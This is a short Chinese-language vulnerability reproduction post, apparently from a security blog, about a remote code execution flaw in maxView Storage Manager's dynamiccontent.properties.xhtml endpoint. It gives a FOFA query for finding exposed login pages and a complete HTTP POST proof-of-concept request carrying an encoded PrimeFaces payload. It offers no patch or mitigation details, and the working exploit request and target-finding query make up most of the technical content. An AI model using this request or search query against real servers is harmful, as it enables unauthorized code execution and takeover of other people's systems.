maxView Storage Manager系统 dynamiccontent.properties.xhtml RCE漏洞复现

0x01 产品简介

 maxView Storage Manager 是一款企业存储和通信解决方案的管理系统。

0x02 漏洞概述

maxView Storage Manager系统dynamiccontent.properties.xhtml存在代码执行漏洞,攻击者可通过 dynamiccontent.properties.xhtml 执行任意代码获取服务器权限。

0x03 漏洞复现

FOFA:title=="maxView Storage Manager - Login"

maxView Storage Manager系统 dynamiccontent.properties.xhtml RCE漏洞复现_第1张图片

0x04 漏洞复现 

PoC

POST /maxview/manager/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

pfdrt=sc&ln=primefaces&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel%2Fv4YXvibdOn52ow4M6lDaKd9Gb8JdQqbACZNWVZpVS%2B3sX1Hoizouty1mYYT4yJsKPnUZ0LUHDvN0GB5

你可能感兴趣的:(漏洞复现,安全,web安全)